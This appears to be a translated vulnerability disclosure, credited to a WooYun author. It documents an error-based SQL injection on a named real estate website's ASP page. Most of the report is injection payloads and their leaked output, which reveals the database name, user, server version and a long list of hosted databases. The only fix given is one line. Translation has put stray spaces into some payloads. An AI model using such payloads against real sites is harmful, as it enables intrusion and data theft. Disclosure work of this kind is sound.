Http://gz.soufun.com/popsite/meilin/shownewsen.asp? Id = 140
Data and server information leakage caused by not filtering parameters
We should be able to proceed further
Proof of vulnerability: http://gz.soufun.com/popsite/meilin/shownewsen.asp? Id = 140
And db_name ()> 0-> db: meilinjiye
And user> 0-> user: meilin
And 1 = convert (int, @ version) ---> version: Microsoft SQL Server 2000-8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
And 0 <> db_name (n)
0-> 'meilinjiye'
1-> 'master'
2-> 'tempdb'
3-> 'model'
4-> 'msdb'
5-> 'pubs'
6-> 'northwind'
7-> 'ntlg'
8-> 'meilinjiye'
9-> 'chengkai'
10-> 'onongdb'
11-> 'shresource'
12-> 'sfb _ xk'
13-> 'export cpddb'
14-> 'szhouse'
15-> 'lingpeng'
16-> 'null'
17-> 'hongda'
18-> 'songdu'
19-> 'myhwk'
20-> 'cshouse'
24-> 'www .jufeng.com'
26-> 'vanker'
27-> 'www .zjnahc.com'
28-> 'www .qcfc.net'
29-> 'www .easeskyplaza.com'
30-> 'huarunxhj'
33-> 'www .zjszfc.com.cn'
40-> 'www .dyxfc.com'
45-> 'www .abbewa.com'
46-> 'www.gz pma.com'
47-> 'www .shangshuiyuan.com'
49-> 'wuhan _ Hits'
...
Solution:
Filter parameters
Author Ambulong @ wooyun